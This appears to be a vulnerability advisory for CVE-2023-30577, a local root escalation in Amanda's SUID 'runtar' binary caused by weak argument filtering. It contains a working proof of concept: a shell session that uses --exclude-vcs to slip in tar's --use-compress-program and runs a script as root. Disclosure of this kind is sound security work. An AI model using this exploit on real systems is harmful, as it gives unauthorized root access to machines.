Summary

To exploit this vulnerability one must have an access to the unprivileged backup user and craft arguments to the SUID runtar binary.

Details

The SUID binary "runtar" can accept the possibly malicious GNU tar options if fed with some non-argument option starting with "--exclude" (say --exclude-vcs). The following option will be accepted as "good" and it could be an option passing some script/binary that would be executed with root permissions.

The problematic code is located in client-src/runtar.c file. The patch is available at your request.

I've registered CVE-2023-30577 at MITRE for this vulnerability.

PoC

$ whoami
backup

$ ls -l /usr/local/libexec/amanda/runtar
-rwsr-x--- 1 root backup 25984 Apr 14 12:01 /usr/local/libexec/amanda/runtar

$ cat /tmp/poc-id.sh
#!/bin/sh
whoami > /tmp/poc-id.out
chmod 666 /tmp/poc-id.out

$ /usr/local/libexec/amanda/runtar NOCONFIG tar --create --file /dev/null --exclude-vcs --use-compress-program /tmp/poc-id.sh /dev/null
tar: Removing leading `/' from member names

$ cat /tmp/poc-id.out
root

Impact

Local privilege escalation.